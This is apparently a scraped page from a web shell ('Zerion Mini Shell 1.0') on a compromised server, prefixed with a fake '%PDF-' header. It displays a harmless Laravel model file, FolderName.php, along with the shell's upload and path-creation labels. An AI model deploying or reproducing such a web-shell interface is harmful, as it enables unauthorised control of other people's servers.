%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/geotechnics/api/app/Models/
Upload File :
Create Path :
Current File : /var/www/html/geotechnics/api/app/Models/FolderName.php

<?php

namespace App\Models;

use Carbon\Carbon;

/**
 * App\Models\Activity
 *
 * @property int $id
 * @property string $name
 * @property Carbon $created_at
 * @property Carbon $updated_at
 */
class FolderName extends BaseModel
{
    protected $fillable = [
        'name',
    ];

    protected $casts = [
        'name' => 'string',
    ];
}

Zerion Mini Shell 1.0